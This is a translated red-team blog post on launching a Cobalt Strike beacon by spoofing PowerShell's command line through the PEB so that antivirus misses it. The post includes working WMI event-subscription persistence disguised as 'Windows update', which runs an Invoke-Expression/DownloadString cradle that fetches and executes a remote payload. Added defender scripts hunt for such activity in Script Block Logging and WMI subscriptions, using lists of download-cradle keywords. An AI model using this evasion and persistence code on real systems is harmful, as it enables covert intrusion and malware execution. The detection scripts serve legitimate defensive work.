Getting a CS beacon online: custom PowerShell argument spoofing to bypass antivirus

2022-01-20 16:10:51

Contents:

1: Principle

2: Experiment steps

3: Evasion result

4: Persistence

Author: an1m0re7 @ 深蓝攻防实验室 (Deep Blue Offense and Defense Lab)

1: Principle

The ProcessParameters member of the PEB points to the block that holds the process command line. By locating the address of ProcessParameters in the target process's memory and overwriting it, the arguments can be replaced. PEB structure: https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb

2: Experiment steps

1. First create a powershell process with arbitrary arguments (ones that 360 does not flag); here I used no arguments.

2. Obtain the PEB address.

3. Obtain the address of ProcessParameters from the PEB structure and replace its contents with the wpm (WriteProcessMemory) function.

3: Evasion result

Checking the process arguments, the process still shows as powershell.exe with no arguments.
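Because ProcessParameters is writable by the parent, the command line that Task Manager, Process Explorer and Win32_Process show for the process is attacker-controlled, and the creation-time record in Sysmon event 1 or Security 4688 only reflects what the parent passed initially. What the PowerShell engine actually executed is recorded by Script Block Logging (event 4104 in Microsoft-Windows-PowerShell/Operational), which a rewrite of the PEB cannot change. The following defender script is an added example, not code from the original post: it checks that the logging policy is enabled, then reports script blocks that contain download-and-execute strings together with the process id so they can be correlated back to the benign-looking process-creation event. The pattern list, the function names and the 200-character snippet limit are constructed choices; the registry path and event id are the real ones.

```powershell
# Added example (not from the original post): surface what powershell.exe actually ran,
# independent of its (spoofable) command line, using Script Block Logging (event 4104).

function Test-ScriptBlockLoggingEnabled {
    # Policy key that turns on 4104 logging; absent key means the policy is not set.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    $v = Get-ItemProperty -Path $key -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue
    return ($null -ne $v -and [int]$v.EnableScriptBlockLogging -eq 1)
}

function Get-SuspiciousScriptBlock {
    param(
        [int]$MaxEvents = 2000,
        # Constructed starting list of strings typical of download cradles and in-memory loaders
        [string[]]$Patterns = @('DownloadString', 'DownloadFile', 'Invoke-Expression', 'IEX ',
                                'FromBase64String', 'Net.WebClient', 'Invoke-WebRequest',
                                'Start-BitsTransfer', 'VirtualAlloc', 'Reflection.Assembly')
    )
    if (-not (Test-ScriptBlockLoggingEnabled)) {
        Write-Warning 'Script block logging is not enabled by policy; 4104 coverage will be incomplete.'
    }

    $events = Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-PowerShell/Operational'
        Id      = 4104
    } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue

    foreach ($ev in $events) {
        # EventData carries MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId and Path
        $xml  = [xml]$ev.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $text = [string]$data['ScriptBlockText']
        if (-not $text) { continue }

        $hits = @($Patterns | Where-Object { $text.IndexOf($_, [StringComparison]::OrdinalIgnoreCase) -ge 0 })
        if ($hits.Count -eq 0) { continue }

        $snippet = if ($text.Length -gt 200) { $text.Substring(0, 200) + '...' } else { $text }
        [pscustomobject]@{
            TimeCreated = $ev.TimeCreated
            ProcessId   = $ev.ProcessId      # join to Sysmon 1 / 4688 to see the command line that was shown
            Path        = $data['Path']      # empty for blocks that never came from a file on disk
            Matched     = ($hits -join ', ')
            Snippet     = $snippet
        }
    }
}

Get-SuspiciousScriptBlock | Format-Table -AutoSize -Wrap
```

A powershell.exe whose creation event shows an empty or harmless command line but whose 4104 records contain a cradle is exactly the pattern this post produces. The engine emits 4104 from inside the process, so the parent cannot spoof it; the remaining gaps are an attacker who clears the log or forces the PowerShell 2.0 engine, which is why the policy check and removal of the v2 engine belong with this detection.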

4: Persistence

This can be combined with a WMI event-subscription backdoor for persistence, and it bypasses 360.

Code (PowerShell):

# Timer instruction that raises a __TimerEvent every 2000 ms (2 seconds) with the ID "Trigger"
$TimerArgs = @{
    IntervalBetweenEvents = ([UInt32] 2000) # 2000 ms = 2 seconds
    SkipIfPassed = $False
    TimerId = "Trigger"
};
$Timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments $TimerArgs;

# Event filter that matches the timer events above
$EventFilterArgs = @{
    EventNamespace = 'root/cimv2'
    Name = "Windows update trigger"
    Query = "SELECT * FROM __TimerEvent WHERE TimerID = 'Trigger'"
    QueryLanguage = 'WQL'
};
$Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs;

# Stage a download cradle on disk; the command the consumer runs comes from $FinalPayload
Write-Output 'Invoke-Expression(New-Object System.Net.WebClient).DownloadString("http://xxxxxxx/a")' | Out-File -FilePath 'c:\xxx.ps1'
$FinalPayload = 'c:\agu.exe http://xxxxxxxx/a'

# Consumer that runs $FinalPayload each time the filter fires
$CommandLineConsumerArgs = @{
    Name = "Windows update consumer"
    CommandLineTemplate = $FinalPayload
};
$Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs;

# Binding that ties the filter to the consumer; this makes the subscription permanent
$FilterToConsumerArgs = @{
    Filter = $Filter
    Consumer = $Consumer
};
$FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs;
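The subscription above leaves three permanent objects in root/subscription (an __EventFilter, a CommandLineEventConsumer and the __FilterToConsumerBinding that joins them), and that is also where a defender finds it. The script below is an added example, not code from the original post: it joins every binding to its filter and consumer, shows what the consumer would run, and flags consumers that execute commands or scripts, timer-driven filters, and download strings. The pattern list, the function names and the reason labels are constructed; the class names and namespace are the real ones. It assumes an elevated PowerShell session and is read-only.

```powershell
# Added example (not from the original post): review permanent WMI event subscriptions.

function Get-RefName {
    # Reference properties arrive as a CimInstance (CIM cmdlets) or as an object path
    # string such as  __EventFilter.Name="Windows update trigger"  (WMI cmdlets).
    param([object]$Ref)
    if ($null -eq $Ref) { return '' }
    if ($Ref -is [string]) {
        if ($Ref -match 'Name="(.*)"') { return $Matches[1] }
        return $Ref
    }
    return [string]$Ref.Name
}

function Get-WmiSubscriptionReport {
    param(
        [string]$Namespace = 'root/subscription',
        # Constructed starting list; extend it from your own environment
        [string[]]$SuspiciousPatterns = @('DownloadString', 'Invoke-Expression', 'IEX',
                                          'FromBase64String', 'http://', 'https://',
                                          '-enc', '-w hidden', '-WindowStyle Hidden')
    )

    $filters   = Get-CimInstance -Namespace $Namespace -ClassName __EventFilter
    $consumers = Get-CimInstance -Namespace $Namespace -ClassName __EventConsumer   # base class: returns every consumer type
    $bindings  = Get-CimInstance -Namespace $Namespace -ClassName __FilterToConsumerBinding

    foreach ($b in $bindings) {
        $filterName   = Get-RefName $b.Filter
        $consumerName = Get-RefName $b.Consumer
        $f = $filters   | Where-Object Name -eq $filterName   | Select-Object -First 1
        $c = $consumers | Where-Object Name -eq $consumerName | Select-Object -First 1

        $consumerClass = if ($c) { $c.CimClass.CimClassName } else { '<unresolved>' }
        # What the consumer actually runs depends on its type
        $action = switch ($consumerClass) {
            'CommandLineEventConsumer'  { "$($c.ExecutablePath) $($c.CommandLineTemplate)".Trim() }
            'ActiveScriptEventConsumer' { if ($c.ScriptText) { $c.ScriptText } else { $c.ScriptFileName } }
            default                     { '' }
        }
        $query = if ($f) { $f.Query } else { '<unresolved>' }

        $reasons = @()
        if ($consumerClass -in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer') {
            $reasons += "executes: $consumerClass"
        }
        if ($query -match '__TimerEvent|Win32_LocalTime') {
            $reasons += 'timer/recurring trigger'
        }
        foreach ($p in $SuspiciousPatterns) {
            if ($action -and $action.IndexOf($p, [StringComparison]::OrdinalIgnoreCase) -ge 0) {
                $reasons += "pattern: $p"
            }
        }

        [pscustomobject]@{
            Binding       = "$filterName -> $consumerName"
            ConsumerClass = $consumerClass
            FilterQuery   = $query
            Action        = $action
            Suspicious    = ($reasons.Count -gt 0)
            Reasons       = ($reasons -join '; ')
        }
    }
}

# Everything is listed; suspicious bindings sort first.
Get-WmiSubscriptionReport | Sort-Object Suspicious -Descending | Format-List
```

Against the subscription created above, the report shows the binding "Windows update trigger -> Windows update consumer" with a CommandLineEventConsumer, a __TimerEvent query and an http:// string in the action, so it is marked suspicious for all three reasons. Sysmon records the same three objects at creation time as events 19, 20 and 21, which is the earlier signal. Some management products register legitimate subscriptions, so review before removing; removal is Remove-CimInstance on the binding first, then the consumer and the filter.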

